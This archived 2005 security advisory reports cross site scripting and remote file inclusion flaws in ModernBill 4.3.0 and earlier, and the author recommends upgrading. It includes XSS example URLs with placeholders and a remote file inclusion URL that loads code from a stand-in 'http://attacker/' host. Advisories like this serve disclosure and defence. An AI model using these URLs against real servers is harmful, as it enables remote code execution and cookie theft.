what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

modernBill.txt

modernBill.txt
Posted Apr 18, 2005
Authored by James Bercegay | Site gulftech.org

ModernBill versions 4.3.0 and below suffer from file inclusion and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, file inclusion
SHA-256 | 8172830d3e3f3a1b826acf07ac2c2a7b87cbce06b47b5f36cc43a041ac135017

modernBill.txt

Change Mirror Download
##########################################################
# GulfTech Security Research April 10th, 2005
##########################################################
# Vendor : ModernGigabyte, LLC
# URL : http://www.modernbill.com/
# Version : ModernBill 4.3.0 && Earlier
# Risk : Multiple Vulnerabilities
##########################################################



Description:
ModernBill is a widely used billing and management software used
by webhosts to manage billing and financial data. ModernBill is
prone to remote file inclusion and cross site scripting in version
prior to 4.3.1. These vulnerabilities could allow for an attacker to
execute client side code in the context of the victims web browser,
steal sensitive user data, and run system commands remotely on the
affected web server. A fixed version is available and users are advised
to upgrade immediately.



Cross Site Scripting:
The ModernBill order forms are prone to multiple cross site scripting
issues. Below are a few examples of this particular issue.

http://example.com/order/orderwiz.php?v=1&aid=&c_code=[XSS]
http://example.com/order/orderwiz.php?v=1&aid=[XSS]

This vulnerability could be used to steal cookie based authentication
credentials within the scope of the current domain, or render hostile
code in a victim's browser.



Remote File Include Vulnerability:
ModernBill ships with a directory titled "samples" that resides in the
root ModernBill directory. This directory contains several files to
help users learn how to customize ModernBill to specifically fit their
needs. One of the scripts included in this directory is vulnerable to
a very dangerous remote file include vulnerability. Lets have a look at
the file "news.php"


// ~~~~~~~~~~~~~~~~~
// DO NOT EDIT START
// ~~~~~~~~~~~~~~~~~
include_once($DIR."include/functions.inc.php");


If globals are set to on, and no include restrictions are in effect then
we can include any php code of our choice remotely. Of course the

hosting the malicious file to be included could not have php enabled, or
the file would be parsed before it reached the victim server.

http://example.com/samples/news.php?DIR=http://attacker/

This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.



Solution:
A fix for the mentioned issues has been available for quite some time now
and users should upgrade their ModernBill installations.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00067-04102005



Credits:
James Bercegay of the GulfTech Security Research Team

--
No virus found in this outgoing message.
Checked by AVG Anti-Virus.
Version: 7.0.308 / Virus Database: 266.9.5 - Release Date: 4/7/2005


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close